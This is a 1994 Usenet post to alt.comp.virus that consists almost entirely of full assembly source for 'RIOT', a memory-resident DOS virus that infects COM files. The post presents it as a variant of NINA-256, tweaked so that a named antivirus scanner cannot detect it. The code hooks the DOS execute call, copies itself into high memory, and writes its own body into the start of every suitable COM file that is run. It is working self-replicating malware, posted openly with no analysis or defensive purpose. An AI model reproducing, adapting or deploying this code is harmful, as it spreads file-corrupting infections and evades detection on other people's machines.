From netcom.com!ix.netcom.com!netnews Sat Nov 12 17:11:15 1994 Xref: netcom.com alt.comp.virus:200 Path: netcom.com!ix.netcom.com!netnews From: Zeppelin@ix.netcom.com (Mr. G) Newsgroups: alt.comp.virus Subject: Re:Riot Date: 12 Nov 1994 03:37:30 GMT Organization: Netcom Lines: 171 Distribution: world Message-ID: <3a1d9q$ma6@ixnews1.ix.netcom.com> References: <3a0s7b$r6i$1@mhadf.production.compuserve.com> <3a1aj7$l5e@ixnews1.ix.netcom.com> <3a1cri$m31@ixnews1.ix.netcom.com> NNTP-Posting-Host: ix-ir4-21.ix.netcom.com ; RIOT! - Revolution In Our Time model tiny code org 100h start: ; push ax ; Original push "ax", PUSH DX ; But push dx instead, ; and S&S FindViru can't ; find it as NINA-256 :) mov ax,9753h ; installation check int 21h mov ax,ds dec ax mov ds,ax ; ds->program MCB mov ax,ds:[3] ; get size word push bx push es sub ax,40h ; reserve 40h paragraphs mov bx,ax mov ah,4Ah ; Shrink memory allocation int 21h mov ah,48h ; Allocate 3Fh paragraphs mov bx,3Fh ; for the virus int 21h mov es,ax ; copy virus to high xor di,di ; memory mov si,offset start + 10h ; start at MCB:110h mov cx,100h ; (same as PSP:100h) rep movsb sub ax,10h ; adjust offset as if it push ax ; originated at 100h mov ax,offset highentry push ax retf highentry: mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the ; memory isn't freed when the ; program terminates mov ax,3521h ; get int 21h vector int 21h mov word ptr cs:oldint21,bx ; save it mov word ptr cs:oldint21+2,es push es pop ds mov dx,bx mov ax,2591h ; redirect int 91h to int 21h int 21h push cs pop ds mov dx,offset int21 mov al,21h ; set int 21h to virus vector int 21h pop ds ; ds->original program PSP pop bx push ds pop es ENDFILE dw 100h ; Size of infected COM file return_COM: mov di,100h ; restore original mov si,endfile ; file add si,di ; adjust for COM starting mov cx,100h ; offset rep movsb pop ax push ds ; jmp back to original mov bp,100h ; file (PSP:100) push bp retf exit_install: pop ax ; pop CS:IP and flags in pop ax ; order to balance the pop ax ; stack and then exit the jmp short return_COM ; infected COM file int21: cmp ax,9753h ; installation check? je exit_install cmp ax,4B00h ; execute? jne exitint21 ; nope, quit push ax ; save registers push bx push cx push dx push ds call infect pop ds ; restore registers pop dx pop cx pop bx pop ax exitint21: db 0eah ; jmp far ptr oldint21 dd ? infect: mov ax,3D02h ; open file read/write int 91h jc exit_infect mov bx,ax mov cx,100h push cs pop ds mov ah,3Fh ; Read first 100h bytes mov dx,offset endvirus int 91h mov ax,word ptr endvirus cmp ax,'MZ' ; exit if EXE je close_exit_infect cmp ax,'ZM' ; exit if EXE je close_exit_infect cmp word ptr endvirus+2,9753h ; exit if already je close_exit_infect ; infected mov al,2 ; go to end of file call move_file_pointer cmp ax,0FEB0h ; exit if too large ja close_exit_infect cmp ax,1F4h ; or too small for jb close_exit_infect ; infection mov endfile,ax ; save file size call write mov al,0 ; go to start of file call move_file_pointer mov dx,100h ; write virus call write close_exit_infect: mov ah,3Eh ; Close file int 91h exit_infect: retn move_file_pointer: push dx xor cx,cx xor dx,dx mov ah,42h int 91h pop dx retn write: mov ah,40h mov cx,100h int 91h retn db ' RIOT!' ; Revolution In Our Time! endvirus: int 20h ; original COM file end start